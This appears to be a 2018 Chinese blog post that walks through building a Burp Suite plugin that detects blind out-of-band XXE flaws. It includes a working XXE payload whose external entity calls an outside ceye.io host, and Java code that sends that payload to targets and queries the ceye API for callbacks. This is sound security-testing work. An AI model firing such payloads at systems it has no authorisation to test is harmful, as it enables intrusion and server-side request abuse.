Burp XXE Scanner 插件开发(附下载)

作者:CQITer小编 时间:2018-05-21 21:23

字号

Burp没有自带检测XXE漏洞功能,也没有插件。于是自己开始动手撸一个XXE Scanner插件出来。

0×01 检测原理

OOB XXE盲攻击,利用ceye监控的http记录,我们再通过ceye给的api进行查询是否有利用XXE漏洞发送的http请求记录。使用如下payload。

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://xxxx.ceye.io/xxe_test"> %remote;]> <root/> 0×02 成品展示

首先需要一个ceye账号,将Identifier(用于http请求到你的ceye账户下)和Token(用于API查询你的http请求记录)分别填入到下图的文本框当中,点击保存。会在burp目录下生成xxe.config,以Identifier|Token格式保存着。下载启动burp的时候,XXE Scanner插件会自动读取xxe.config,获取到上次保存的参数。

1.png

请求带xxe_XXXXXXXXXX(10个随机字母或数字),用于后面判断是否利用XXE发送了http请求。

2.png

通过api查询,检测到带有xxe_XXXXXXXXXX(10个随机字母或数字)的请求,则报XXE inject。

3.png

0×03 插件开发

由于有需要填写配置参数,所以需要一个自定义tab页面。需要使用ITab接口,并且使用IBurpExtenderCallbacks.addSuiteTab()进行添加。新建XxeOption类继承ITab,然后再构造方法里面添加控件。

public XxeOption(final IBurpExtenderCallbacks callbacks) { this.callbacks = callbacks; jp = new JPanel(); jlId = new JLabel("Identifier:"); jlToken = new JLabel("API Token:"); jtfId = new JTextField(10); jtfToken = new JTextField(20); //设置Id,Token文本框 File file = new File("xxe.config"); if(file.exists()){ String info = ReadConfig(); if(info.contains("|")) { jtfId.setText(info.split("\|")[0]); jtfToken.setText(info.split("\|")[1]); } } jb = new JButton("保存"); jb.addActionListener(this); jp.add(jlId); jp.add(jtfId); jp.add(jlToken); jp.add(jtfToken); jp.add(jb); callbacks.addSuiteTab(XxeOption.this); }

最后在registerExtenderCallbacks方法里实例化XxeOption即可。

IScannerCheck可以自定义扫描,一种是doActiveScan主动扫描,一种是doPassiveScan被动扫描。主动扫描是对每个参数进行扫描,会发送n次请求包。而被动扫描只会扫一次,将doPassiveScan函数代码走完一遍就完了。而检测XXE我们只需要发送一次数据包,所以选择被动扫描。

public List<IScanIssue> doPassiveScan(IHttpRequestResponse baseRequestResponse) { //code return null; }

接下来就是发送xxe payload。使用buildHttpMessage将headr和body组合。再使用makeHttpRequest发送请求。

//xxe payload byte[] xxePayload = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<!DOCTYPE root [\n" + "<!ENTITY % remote SYSTEM \"http://" + xxeOption.jtfId.getText() + "/" + flag + "\">\n" + "%remote;]>\n" + "<root/>").getBytes(); //修改body为xxe payload,并且发送xxe payload http包 byte[] xxe = helpers.buildHttpMessage(helpers.analyzeRequest(baseRequestResponse.getRequest()).getHeaders(),xxePayload); IHttpRequestResponse checkRequestResponse = callbacks.makeHttpRequest( baseRequestResponse.getHttpService(), xxe);

使用makeHttpRequest进行api接口查询。

//构造发送到ceye.io的IHttpService IHttpService test = new IHttpService() { @Override public String getHost() { return "api.ceye.io"; } @Override public int getPort() { return 80; } @Override public String getProtocol() { return "http"; } }; //构造发送到ceye.io的http headers信息 byte[] ceye = ("GET /v1/records?token=" + xxeOption.jtfToken.getText() + "&type=request&filter=" + flag + " HTTP/1.1\n" + "Host: api.ceye.io\n" + "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\n" + "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n" + "Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3\n" + "Accept-Encoding: gzip, deflate\n" + "DNT: 1\n" + "Connection: close\n" + "Upgrade-Insecure-Requests: 1\n" + "\n").getBytes(); //stdout.println("GET /v1/records?token=" + xxeOption.jtfToken.getText() + "&type=request&filter=" + flag + " HTTP/1.1\n"); //发送数据包到ceye.io IHttpRequestResponse ceyeRequestResponse = callbacks.makeHttpRequest( test, ceye);
责任编辑:CQITer新闻报料:400-888-8888   本站原创,未经授权不得转载
继续阅读
热新闻
推荐
关于我们联系我们免责声明隐私政策 友情链接